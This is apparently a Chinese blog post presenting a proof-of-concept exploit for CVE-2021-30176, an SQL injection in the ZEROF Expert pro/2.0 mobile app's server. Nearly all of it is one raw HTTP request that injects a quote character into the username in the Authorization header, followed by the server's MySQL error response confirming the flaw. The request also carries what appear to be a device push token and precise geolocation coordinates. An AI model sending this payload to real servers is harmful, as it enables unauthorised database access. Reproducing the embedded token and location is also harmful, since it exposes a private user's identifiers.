# CVE-2021-30176 ZEROF Expert pro/2.0 application for mobile devices SQL注入漏洞
==EXP==
POST /v2/devices/add HTTP/1.1 Host: zerof Content-Type: application/x-www-form-urlencoded; charset=utf-8 Accept: */* Connection: close Date: Thu, 07 Apr 2021 13:40:57 +0300 Content-Length: 241 User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2 Accept-Language: ru-RU;q=1.0 Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak= Accept-Encoding: gzip, deflate device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP
HTTP/1.1 500 Internal Server Error Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 176 Date: Wed, 07 Apr 2021 10:35:59 GMT Server: ZEROF Web Server #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容